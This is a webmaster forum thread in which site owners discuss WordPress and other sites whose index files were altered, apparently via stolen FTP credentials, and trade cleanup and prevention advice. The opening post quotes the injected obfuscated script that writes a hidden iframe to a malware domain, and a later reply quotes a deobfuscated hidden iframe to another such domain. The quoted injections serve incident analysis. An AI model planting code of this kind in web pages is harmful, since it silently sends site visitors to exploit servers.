Random Code Found at Bottom of index.php Files

Funky Bunch

Funky Bunch

New member
Jun 6, 2007
65
1
0
So...yea. Hoping someone better at this type of thing can help me out. I found the following line of code at the bottom of all index.php files for a wordpress install.

\<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>

As near I can tell, its trying to throw up a 1x2 pixeled iframe for microsotf.cn ? Apparently that site was just registered on the first of this month, and the ip is in russia.

I only found it because my site threw up a php error when I visited it, and then I found that those files had been modified today. Found 2 other sites on my vps with the same issue. Other than the vps, the only similarities between the 3 are that they're all wordpress installed phpbay sites, but that's true for a couple other sites on my vps as well...

Anyone mind helping out with whatever comes to mind?
 


It probably tries to load an exploit which downloads and executes a keylogger to steal CC numbers etc.

Get it removed ASAP and change appropriate passwords, look for new user accounts and look for any suspicious php files.
 
Thanks for the replies guys.

Somehow they got hold of my ftp logins for 4 sites on that vps, and just downloaded/uploaded a bunch of php files with that code added. Not sure how, really, since I do daily scans with multiple programs, but I guess even the paranoid get crap like this happening.

Changed my passwords and hopefully cleaned up everything...hope I didn't miss anything. :uhoh2:
 
its a common iframe attack as people have said. look for files without extensions that could still be on the system.
 
ikonic said:
its a common iframe attack as people have said. look for files without extensions that could still be on the system.
Click to expand...

Something about you gives me the jeebies ... I think it was a post a while ago where you showed off way too much sql knowledge.

Whew, now that I've got that off my chest ... can I look inside your bag of tricks?
 
Backup your wordpress database.

Delete your wordpress files (all of it)

Download the latest 2.8 version of wordpress and edit the config file to point to your database.

And of course change your password (as you already seemed to have). They probably didn't get your FTP info, but rather used an exploit in an older version of wordpress, since those kind of attacks are usually on automation these days.
 
I had something similar happening to an e-commerce site I help run. They inserted heavily obfuscated JS code at the end of common files, such as login.php, index.php etc. When de-obfuscated, it produced this code:
Code: 
<iframe name=c18 src='http://mirain.cn/sv/index.php?8da46bb6c' width=70 height=438 style='visibility:hidden'>
</iframe>

The FTP log showed access from an IP in Latvia. I could see how they downloaded the files and re-uploaded them less than a second later with the script inserted - obviously automated.

I only caught this because one day when loading our homepage, Safari on a Mac spit out an error:
The page [My e-commerce site] has content of of MIME type "video/x-ms-wmv". Because you don't have a plugin installed for this MIME type, this content can't be displayed.
This was a legit browser error, not one of those fake "You're missing a plugin" lures; WMV = Windows Media Video, not installed on a default Safari. But there is no such media on our normal homepage.

At first, we just removed the inserted script by overwriting the site from a backup, but within hours they inserted it again. It stopped after we changed passwords.

Our FTP pwd was a 8-character mix of letters and numbers, not in any dictionary. Although it seems ok for now, I'm afraid if they broke in once, they could do it again unless we fix the specific exploit they may have used. And I don't know what that is, which makes me feel very iffy about this.
 
I would say get rid of footprints on any standard especially Open Source software you are using. I keep getting tons of people searching for "Powered by Wordpress" "keyword1 keyword2" "Name (required)"

Obviously they are looking for Wordpress to spam comments, but the same things are done on all software modules. Change the footers and comment footprints around a bit...
 
Really appreciate everyone's help and suggestions. Found a 5th site of mine with a different host that had also been affected, so I've been having fun cleaning that up.

Does anyone know of a specific tool that can scan your site for you to detect this type of crap early on? I'd have had no idea anything was wrong if my sites hadn't been throwing up errors, and I don't really like the idea of always having to go through all the files of my sites on a regular basis.
 
erect said:
Something about you gives me the jeebies ... I think it was a post a while ago where you showed off way too much sql knowledge.

Whew, now that I've got that off my chest ... can I look inside your bag of tricks?
Click to expand...

haha - don't worry about me. I'm all good. I have no need to trouble anyone. I am but a hubble soul working in the banking industry (online) with a penchant for web application security and programming. So...anytime you got a question about either, feel free to pm me.

EDIT:

@OP - you probably had a link to the new 0 day exploit for IE running off your site.
 
Damnit these threads scare the piss out me. When you brilliant bastards are stumbling, people like me are fucked.
 
Ikonic, since you seem knowledgeable, do you have any idea how someone would be able to break into an FTP account to do this shit (see my post #10 above). Or, more specifically, what I can do to prevent this in the future?
 
ScanSafe STAT Blog - ScanSafe STAT Blog - Malware Ads HitPirateBay

ThePirateBay and other torrent and ROM sites were victims of malicious ads over the past weekend. The malicious ads employed PDF exploits which attempted to download malware onto visitors' computers. The ads were delivered via ad.yieldmanager.com. Malware domains used included:

aralowsiv.com
microsotf.cn
zabicks.com
Click to expand...


ya'll probably have a trojan. i bet everyone infected has their ftp credentials stored locally. good luck
 
envision said:
Ikonic, since you seem knowledgeable, do you have any idea how someone would be able to break into an FTP account to do this shit (see my post #10 above). Or, more specifically, what I can do to prevent this in the future?
Click to expand...

You got the 0 day.

Unless your site is high volume chances are it was automated attack using ftp details picked up via a keylogger or trojan on one of the computers used to access the site. This could be your computer, the hosting companies computer or any computer transmitting the data between you and server(ftp isn't secure).

To confirm this look at the ftp logs. Single login, 1 time only? If so they had details before you did. If not, perhaps a brute force attack and you can tell that by the velocity of login attempts per x.

Also which ftp account was used and does it have a default password? Use that to work off and change your ftp password regularly, make sure you have AV, Firewall and Malware removal software all computers used to connect to the site... and better yet use sftp if you can to connect.

Finally, create sole user accounts for each person with ftp access to the server so its easy to isolate if it happens again (since they are already getting the info).
 
I got this on a server I manage not long ago. From what I've seen, I believe it is a Wordpress exploit. I wrote a script to scan all files on the server for known exploit strings, and remove them. Sorry I don't have the script anymore, or else I would post it up. Good luck.
 
legitPHP said:
I got this on a server I manage not long ago. From what I've seen, I believe it is a Wordpress exploit.
Click to expand...

I wouldn't be so quick to say it's a WP exploit - I saw this on a site I manage (about three weeks ago) that was custom-coded and didn't use WP (or even a database). So I think the vulnerability lies with the FTP account (i.e. sniffing for passwords) rather than a specific type of software or CMS or whatever.

All the script looks for (the malicious script) is a standard index file (index.php, index.html) and it inserts the concealed code.
 
Where there any other sites on the server running wordpress? I'm not 100% on the wordpress thing, and it surely could have been the result of a keylogger on a client machine. An outdated Wordpress install just seemed to be the common factor between all cases I've seen. On the machine I cleaned up, it had been hit several times by many different attackers. Some only injected code on index.* files, others *.html, others *.php. Being that it was obviously hit from many different attackers made me think that it was a software vulnerability.
 
You must log in or register to reply here.
Top Bottom